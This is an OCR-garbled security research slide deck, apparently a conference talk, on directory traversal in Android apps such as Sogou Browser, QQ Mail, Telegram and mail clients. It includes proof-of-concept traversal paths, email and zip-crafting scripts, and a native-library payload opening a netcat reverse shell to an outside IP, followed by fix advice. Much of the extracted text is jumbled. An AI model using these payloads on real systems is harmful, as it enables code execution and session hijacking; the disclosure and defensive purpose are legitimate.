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About Us 


e Aloha Team @360 Security 
* 100+ Android vulnerabilities (Google Qualcomm etc) 
* Won the highest reward in the history of the ASR program. 


e 5 Pwn contest winner 
e Pwn2O0wn Mobile 2015( Nexus 6) 
* PwnORama 2016 (Nexus 6p) 
e Pwn2O0wn 2016(Chrome) 
* PwnFest 2016(Pixel) 
e Pwn20wn Mobile 2017(Galaxy S8) 
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What is directory traversal 


* Acontrollable or partially controllable file name. 
e Lack of file name canonicalization 


String fileName = response. fileName; 

File f = new File(Environment.getExternalStorageDirectory() + fileName); 
FileOutputStream out = new FileOutputStream(f,true); 
out.write(filecontent.getBytes( "UTF-8")); 


* Can be exploited with a malfored filename: 
° /./../../../../data/data/com.vulnerable.app/files/plugin.so 


Impacts of traversal 


* Arbitrary file reading via traversal 
* Information leakage ( token, user info, etc. ) 
* Clone Attack 


* Arbitrary file Writing 
e Phishing 
* Denial of Service 
* Account Replacement 
* Arbitrary code execution 
* Clone Attack 
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Where to find Directory traversal 


* Opening file in exported content provider 

e Attachment saving in mailbox application 

e Manually decompressing archives in Web-browser/File Manager 
e Downloading and unzipping resources during running 

* Unsafe unzipping files in the SD Card 

* Transferring files in Instant Messaging Apps 

e Syncing files in Cloud Drive Apps 

e Backup and restore 


Directory traversal in exported Content 
provider 


* exported:true 
* Overrided openFile method in the content provider 


e Vulnerable code snippet 
{ 


openFile( uri, mode) { 
file ~ File( Environment.getExternalStorageDirectory() + 
z 


, uri.getPath()); 


ParcelFileDescriptor.open(file, ParcelFileDescriptor.READ ONLY MODE); 


e PoC: 


* adb shell content open 
content://mydownloadcontentprovider/..962f..962f..962f..962f..962fsdcard962freadme.t 
xt 


Attachment saving in mailbox apps 


e There are two fields that must be 
canonicalized 


* Filename1 specifies the attachment 
name for gmail 


* Filename2 specifies the attachment 
name for outlook 
* We can specify these fields with a 
python script 


------ 714A286D976BF3E58D9D671E37CBCF7C 
Content-Type: text/html 


«html» 
«body» 
test 
</body> 
</html> 


------ 714A286D976BF3E58D9D671E37CBCF7C 
Content-Type: image/png; name="filename1" 
Content-Transfer-Encoding: base64 
Content-Disposition: attachment; filename="filename2" 


------ 714A286D976BF3E58D9D671E37CBCF7C 


Attachment saving in mailbox apps 


composed = Content-Type: multipart/signed; protocol-"application/x-pkcs7-signature"; micalg-shal; 
boundary-" ----714A286D976BF3E58D9D671E37CBCF 7C" 

MIME-Version: 1.0 

Subject: hello world 

To: """4 MAIL ADDRESS +""" 

From: """ + FROM ADDRESS + """ 


714A286D976BF3E58D9D671E37CBCF 7C 
Content-Type: image/png; name-"../../../../../sdcard/poc" 
Content-Transfer-Encoding: base64 
Content-Disposition: attachment; filename-"filename" 


ZGVACjAzNQC2b1d8KTQjX;j cf NNF8BhWJCDLW-4VY69PBE2 TuACAAAAHhWNBIAAAAAAAAAAHTYPAAg 
gAAACAAAAKAUAADwAAIAPRSAAHBTAgDCOwAAT JoDAER1AABceAUAagAAAHwi CQCI6TEAvOSKAL zv 
714A286D976BF 3E58D9D671E37CBCF7C" " " 


= smtplib.SMTP SSL("smtp.163.com") 

.login( MAIL ADDRESS , MAIL PASSWORD) 
.sendmail(MAIL ADDRESS, TO ADDRESS, composed) 
.quit() 


Zio decompress in web browser or file 
manager apps 


e Steps to verify: 
* Download a malformed zip file/ store a malformed zip file on the sdcard 
* Manually trigger the decompress operation. 


* Generate a malformed zip file: 


fname = "sgexp.zip" 
src fname = "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqa" 
dest fname = "../../../../data/data/sogou.mobile.explorer/app libs/libvplayer.so" 


with open(fname,"rb") as f: 
data - f.read() 
data - data.replace(src fname, dest fname) 


with open(fname,"wb") as f: 
f.write(data) 


* Case: 
e CVE-2018- 8084 Directory traversal in Sogou Browser 


Downloaded zip resources 


e Vulnerable 


e Static analysis or scanners 
e grep - include *.smali -r zipEntry . 
e Controllable 
e Attack surfaces 
* Insecure Communication / Insecure Storage / Exported Components 
e Static analysis 
* Recursively find the caller of target function 
e Dynamic analysis 
* Hooking 
* MITM 


Hooking 


‘Hooking File.exists() to ay 
intercept all reading A a 
actions FileClazz.exists.implementation = function () { 
* Filter files that end with Du ETT 
“Zip” if ( path. endwith( » 


var my exception obj - class exception.$new(); 
trace - class log.getStackTraceString(my exception obj); 
console.log(trace); 


e Print the stack backtrace 
to see whether it is — 
controllable MEME 


Directory Traversal in Instant Messaging Apps 


* Steps to find directory traversals in IM 
* send a file with malformed filename to the target 
* the target clicks or downloads the file to trigger a directory traversal 


* How can we send a malformed file 
* MITM 
* Hooking 
* Repackaging or recompiling 


Possibility of MITM 


e Example 


POST /r/talk/m/reqseq HTTP/1.1 . 

Host: obs-cn.line-apps.com Base64.decode( x-obs-parms): 
accept: */* 

X-Line-Application: ANDROID 7.5.2 Android OS 7.1.2 ( 

cache-control: no-cache : Test — 

X-Line-Access: dba k oldfile , 
TTJv6nvhiNoakGatiGOgvió6qtoNdS1CSldUB8etGtAOOSyi1WOuNhObaDFCVTXtzDyVTrUNG oid":"reqseq", 
+rugxJyjZF3QYmU+kLeY7+Q5R/ / 9)Ww9WAZSseXwK "range":"bytes 0-7\\/8", 
*4qHaH7lNnpwY2iO2Stgb8Gnb6kr29Ws "type":"file", 
*TxYilD0cz3i8/1ttkDnVVnUoZHKyruzqNSQQPU6809D4YnHMRARadcaQIe8L1tBuQpyGF "reqseq" :"17", 

+61VF4L8nuY8TwKF yH4AWveAJXjf YkAmv7r sHAOOmcVFD5vbW3dONwelkXUULsXZed7ue8Y "tomid":"u72dc8xxxxxxxxxxje2800657090 " 
v9ZZtpIunP43yBwBFcEpm ^ "eng o" 2 
+ToguiRjOuvnrUaJpnMAhCMMMathqKXAYOafLvo9hqbTBksfcwUA/ thao 
refUKVKZMGM6zwciVIGkgAH21ILIB+aHLThE4BONTIIVOZ6bnfEq4B8eeqPR691Y/ } 


kposwlyhPXU+9zkTKo2phZXqbBs1yl2noAg== 

content-type: 

x-obs-params: 
eyJuYW1lIjoib2xkZzmlsZSIsIm9pZCI6InJlcXNlcSIsInJhbmdlI joiYnlOZXMgMCO3XC 
X-Line-Carrier: 46001,1-0 

User-Agent: Line/7.5.2 

connection: Keep-Alive 

Content-Length: 8| 


Case via hooking 


e CVE-2018-10067 Directory travsesal in QQ series Ma —_— 
Elphet Ka 4 
products Qu russa -Wi 
* We can modify the filename via hooking during 
sending 


A MM... ../sdcar 


d/anotherfile 


.stringify(payload) ) 
.4(methodName )s.overloads 


[i] .apply( 


Case via repackaging or recompling 


. .method public serializeToStream(Lorg/telegram/tgnet/AbstractSerializedData;)V 
* CVE-2017-17715 Directory -locals 1 
" .param p1, "stream" # Lorg/telegram/tgnet/AbstractSerializedData; 
travsersal in Telegram Messenger 
s - .line 738 
( Discove red by Natalie) sget vØ, Lorg/telegram/tgnet/TLRPC$TL documentAttributeFilename;-»constructor:I 


e Didn't canonicalize the filename TUE v0), Lorg/telegram/tgnet/AbstractSerializedData; 
during downloading document 


.prologue 


.line 739 
iget-object v0, p0, Lorg/telegram/tgnet/TLRPC$TL documentAttributeFilename; 


e How to specify a malformed file -»file name:Ljava/lang/String;| 


n a m e d u ri ng se n d | ng fi le "_./../../../data/data/org.telegram.messenger/files/tgnet.dat.bak™ 
e Repackaging or recompiling invoke-virtual {p1, v0), Lorg/telegram/tgnet/AbstractSerializedData; 


-»writeString(Ljava/lang/String;)V 


.line 740 
return-void 
.end method 
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Categories of directory traversal 


* Be able to read arbitrary files 
* Logic bugs in exported components 


* Be able to Overwrite arbitrary files directly 
e Path traversal in unzip 
e Sync directory of a Cloud Apps 


* Be able to write, but cannot overwrite files 
e Download a document and rename if file already exists in Document Apps 
e Download an attachment and rename if file already exists in Mailbox 


* Download an arbitrary file and rename if file already exists in Instant 
Messaging Apps 


Tricks for exploiting 


* Files to be used by an application 
* General Files 
* SharedPreference in /data/data/«package name»/shared prefs/«sp».xml 
* Sglite Databases in /data/data/«package name»/databases/«db».db 
e Plugins 
* shared libraries/ dex / jar / apk 
* pre download, dynamically load and unload 
* Hot patches 
e Fix critical vulnerabilities by pushing emergency patches 
* Combine with multi-dex mechanism 
* Executables 
* eg. watch server 


CVE-2018-8084 Directory traversal in Sogou 
Browser 


* Allows overwriting files | "MD 
directly pm nup D nM 


* there're so many shared 
libraries exists in /aop_libs/Libyvo 
/data/data/sogou.mobile. Kaksin 


explorer/ 
JNIEXPORT jint JNI Onload(JavaVM *vm, *reserved){ 
e Wwe overwrites a proper system("chmod 777 /data/local/tmp/busybox"); 
system("/data/local/tmp/busybox nc 192.169.31.33 12306 -e 
one to get a shell /syste/bin/sh &"); 


return JNI VERSION 1 4; 


* libvplayer.so 


CVE-2018-5722 directory traversal in Tencent 
QQ Mail 


* Directory traversal in Attachment downloads 
* Vulnerable when logging in with Gmail or Gmalified address (Hotmail/Yahoo) 
* Controllable file name of attachment 
* lacking of cananicalization 


* Dangerous hot patches with multi-dex 
* Using File.listFiles(DexFilter) to find all dex files in a certain directory and load 
them directly 
* Exploit 
e /data/data/«package name»/app moai patch/a.dex 
* Smali injection to classes to be load 


CVE-2018-5722 directory traversal in Tencent 
QQ Mail 


* Directory traversal in Attachment 


public static boolean attachPatchDex(^pp! arg/, File arg8) throws Exceptio: 
downloads ArrayList vl = new ArrayList(); 
: : : : File[] v0 = new File(arg8, "dex" )listF}les(new DexFilter()); 
* Vulnerable when logging in with Gmail if(v0 == null vO.length == O) { 
or Gmalified address (Hotmail/Yahoo) PatchLog w(2028, arg& getAbsolutePath(); 
* Controllable file name of attachment æ 
* lacking of canonicalization addAll(((Collection)v1), ((Object[)V))) 
; ; File v2 = MultiDex.getDefaultMultiDexDir(((Context)arg7)); 
* Dangerous hot patches with multi- PatchUtiLforceMkdir2) 
dex if(t SVERSION.SDK INT >= 24) | 


* Using File.listFiles(DexFilter) to find all 


dex files in a certain directory and load 
them directly 


AndroidNClassLoader.replacePathClassLoader(arg? ; 
} 


CVE-2018-5192 Directory travseral in Netease 
Mail Master 


* Directory traversal in Attachment downloading 
e Similar to directory travseral in QQ Mail 
* Vulnerable when logging in with Gmail or Gmalified address (Hotmail/Yahoo) 
* Controllable file name of attachment 
* lacking of canonicalization 


e Dangerous advertisement plugin loading and updating 

e |t loads finalcore.jar after launch 

* Update finalcore.jar by rename newcore.jar to finalcore.jar if exists 
* Exploit: 

e We can place “newcore.jar”, and wait for reloading 


CVE-2017-17715 Directory traversal in 
Telegram (Discovered by Natalie) 


* Directory traversal in Downloading 


documents Config::Config(std::string fileName) ( 
e Cannot overwrite existing files. configPath - ConnectionsManager::getInstance() 
Á .currentConfigPath + fileName; 
* Controllable file name of documents backupPath = SR + 
* lacking of canonicalization when downloading Pops : R UE ); 
ackup != 
* The implementation of tgnet module is DEBUG D( 
, configPath.c str(), backupPath.c str()); 
dangerous fclose(backup); 
" remove(configPath.c str()); 
i Exploit1: rename(backupPath.c_str(), configPath.c_str()); 
e We can place tgnet.dat.bak file and wait for } 
loading 


e Results in a crash / possibility of session 
hijacking 


CVE-2017-17715 Directory traversal in 


T | SharedPreferenceslmpl.ava X 
e eg ral | | private void startLoadFromDisk() í 


synchronized (this) { 


] mLoaded - false; 
* Exploit 42 ) 


new Thread( JA 
* The implementation in AOSP public void run() { 
" synchronized (SharedPreferencesImpl.this) { 
also has backup file restore IoodtrosDi ski ockedO): 
logic = 
* This is a general way to EAE 


overwrite files if we can not | 
: $ s private void loadFromDiskLocked() í 
overwrite files directly V 
return; 
} 
if (mBackupFile.exists()) í 
mFile.delete(); 


mBackupFile.renameTo(mFile); 


CVE-2017-17715 Directory traversal in 
Telegram 


e Exploit H2 «string name="user"> 
mpcNOXcEAABgZJYQ8MBdJdLOUlUDRm9vAO0JhcgwzOTMOOTCcyNjEZzMTEAAADI2FnVqqcxG2BklhB2 
kNZTBAAAAEZ9ZBkAAAAAllECAJqckXxOysePdpDWUWwQAAABGfWQZAAAAAJhRAgDJUmK7duDsdd0k5 


e What can we overwrite ue3eMAJY 


«/strinq» 
* tgnet.dat k Íb 


* userconfing.xml - 
id: 278291552 


" first name: Foo 
What Can we do last name: Bar 
: username: @foobar 
£ AC cou nt re p | aci ng phone: 39XXXXXXXXXX (redacted to preserve privacy) 
ó Sessio n h ija ck photo_small> [volume_id = 42601607, local_id = 151958] 


photo big [volume id = 42601607, local id = 151960] 


* Device binding and force 
logout 


SharePreferences 


* Items we could hijack: Sk DA added in API level 1 
* Download URLs 


public interface SharedPreferences 


* plugins 
e Patche S android.content.SharedPreferences 
e new APKS 


e Version code 


: hedul 
U pd ate a ed ule int). For any particular set of preferences, there is a single instance of this class that all clients share. 
=U pd ate fi | e h Aas h Modifications to the preferences must go through an sharedPreferences.Editor object to ensure the 


Interface for accessing and modifying preference data returned by getsharedPreferences(String, 
J y - P g \ o 


° Se rvers preference values remain in a consistent state and control when they are committed to storage 
* Server IP an Port Objects that are returned from the various get methods must be treated as immutable by the 
* DNS server 


* Proxy server 


application. 
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How to FIX 


e Rename or concat the 
downloaded files with a hash 


* Always canonicalize the user- 
controllable filename 


* Avoid reading important files 
on the SD card 


e Check the integrity of 
important files 


openFile ( uri, 
throws FileNotFoundException { 
p File(DIR, uri.getLastPathSegment()); 
(lf.getCanonicalPath().startsWith(DIR)) í 
IllegalArgumentException(); 


criptor.open(f, 
LJ 


THANKS 
Q&A 


